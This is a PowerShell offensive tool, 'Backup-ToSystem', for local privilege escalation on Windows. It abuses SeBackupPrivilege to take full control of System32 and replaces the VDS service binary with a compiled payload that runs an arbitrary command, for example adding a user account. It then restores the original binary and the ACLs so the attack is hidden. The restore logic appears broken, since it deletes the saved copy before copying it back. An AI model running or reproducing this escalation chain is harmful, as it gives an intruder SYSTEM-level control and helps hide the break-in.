function Backup-ToSystem {param($command) $ErrorActionPreference = "SilentlyContinue" if ($menu -ne $null) {[bool]$colorenable = $true} $banner = @" ___ _ ____ __ _ / __\ __ _ ___| | ___ _ _ __|___ \/ _\_ _ ___| |_ ___ _ __ ___ /__\/// _`` |/ __| |/ / | | | '_ \ __) \ \| | | / __| __/ _ \ '_ `` _ \ / \/ \ (_| | (__| <| |_| | |_) / __/_\ \ |_| \__ \ || __/ | | | | | \_____/\__,_|\___|_|\_\\__,_| .__/_____\__/\__, |___/\__\___|_| |_| |_| |_| |___/ "@ $help = @" .SYNOPSIS Backup to System PowerShell Function: Backup-ToSystem Author: Luis Vacas (CyberVaca) Required dependencies: None Optional dependencies: None .DESCRIPTION .EXAMPLE Backup-ToSystem -command "net user cybervaca CabeshaOwned1 /add" Description ----------- We abused the SeBackupPrivilegeprivilege, to change the System32 ACLS and modify a binary to trigger it later. We then left the system as it was before the attack. "@ function Acl-FullControl {param ($user,$path) $help = @" .SYNOPSIS Acl-FullControl PowerShell Function: Acl-FullControl Author: Luis Vacas (CyberVaca) Required dependencies: None Optional dependencies: None .DESCRIPTION .EXAMPLE Acl-FullControl -user domain\usuario -path c:\users\administrador Description ----------- If you have the SeBackupPrivilege privilege. You can change the permissions to the path you select. "@ if ($user -eq $null -or $path -eq $null) {$help} else { "[+] Current permissions:" get-acl $path | fl "[+] Changing permissions to $path" $acl = get-acl $path $aclpermisos = $user,'FullControl','ContainerInherit,ObjectInherit','None','Allow' $permisoacl = new-object System.Security.AccessControl.FileSystemAccessRule $aclpermisos $acl.AddAccessRule($permisoacl) set-acl -Path $path -AclObject $acl "[+] Acls changed successfully." get-acl -path $path | fl $acl = get-acl c:\\programdata set-acl $path $acl } } function informa-colors {param ($msg) ;$Color = [char]27 ; $RED = "[31m" ;$GREEN = "[92m" ; $END = "[0m"; "$Color$GREEN[$color$RED+$Color$GREEN] " + $msg + "$color$END"} function Create-Binary { $code = @" using System.Diagnostics; class Program { static void Main() { ProcessStartInfo startInfo = new ProcessStartInfo(); startInfo.FileName = "cmd.exe"; startInfo.Arguments = "/c start ARGUMENTOS"; Process.Start(startInfo); } } "@ $code = $code.Replace("ARGUMENTOS",$command) $code | Out-File -FilePath c:\programdata\temp.cs Start-Process (ls C:\Windows\Microsoft.NET\Framework -Recurse -file | Where-Object {$ -like "csc.exe"} | Select-Object fullname -First 1).fullname -ArgumentList "/t:exe /out:c:\programdata\temp.exe c:\programdata\temp.cs" do {sleep -Seconds 2} while (((Test-Path c:\programdata\temp.exe) -eq $false )) } if ($command -eq $null) {$help} else { function print-banner {param($banner)$Color = [char]27;$RED = "[31m";$GREEN = "92m";$END = "[0m";"$Color$RED" + $banner + "$Color$end"; "`n by CyberVaca"} if ($colorenable -eq $true) {print-banner $banner} else {$banner + "`n by CyberVaca"} if ($colorenable -eq $true) {informa-colors "Backup ACL"} else {"[+] Backup ACL" } $acl_backup = get-acl c:\windows\system32\ if ($colorenable -eq $true) {informa-colors "Changing ACL"} else {"[+] Changing ACL"} Acl-FullControl -user $env:USERDNSDOMAIN\$env:username -path c:\windows\system32\ | out-null if ($colorenable -eq $true) {informa-colors "Writing Payload"} else {"[+] Writing Payload"} get-service vds | Stop-Service | Out-Null move c:\windows\system32\vds.exe C:\ProgramData\ Create-Binary copy c:\programdata\temp.exe c:\windows\system32\vds.exe if ($colorenable -eq $true) {informa-colors "Trigger Payload"} else {"[+] Trigger Payload"} get-service vds | Start-Service | Stop-Service | Out-Null sleep -Seconds 5 if ($colorenable -eq $true) {informa-colors "Deleting temp Files"} else {"[+] Deleting temp Files"} del c:\programdata\temp.cs del c:\programdata\temp.exe del c:\programdata\vds.exe if ($colorenable -eq $true) {informa-colors "Restore files"} else {"[+] Restore files"} $save_path = Get-Location Set-Location c:\programdata\ copy vds.exe c:\windows\system32 Set-Location $save_path get-service vds | start-service if ($colorenable -eq $true) {informa-colors "Restore backup ACL"} else {"[+] Restore backup ACL"} set-acl -path c:\windows\system32\ $acl_backup "`n" } }